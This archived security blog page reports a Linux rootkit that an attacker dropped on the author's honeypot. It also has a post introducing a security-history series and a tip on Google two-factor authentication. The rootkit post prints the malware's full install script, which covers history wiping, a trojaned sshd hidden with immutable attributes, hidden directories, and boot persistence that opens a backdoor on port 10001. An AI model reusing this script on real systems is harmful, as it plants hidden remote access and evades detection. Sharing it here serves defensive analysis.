This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using Putty dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
mv libcrypto.so.4 /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks* 
Posted by on No comments:
Ingredients: , , , ,

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!
Posted by on No comments:
Ingredients: ,

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smart phone such as Blackberry Android or iPhone you can easily add an extra layer of protection to your Google account including Gmail or Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once setup you will be asked for a time-sensitive PIN provided by your smartphone when logging into your Google account.

Even if your account password is stolen or guessed your account will be secure!

Read more at Google's 2-step verification page.
Posted by on No comments:
Ingredients: , , , ,
Subscribe to: Posts (Atom)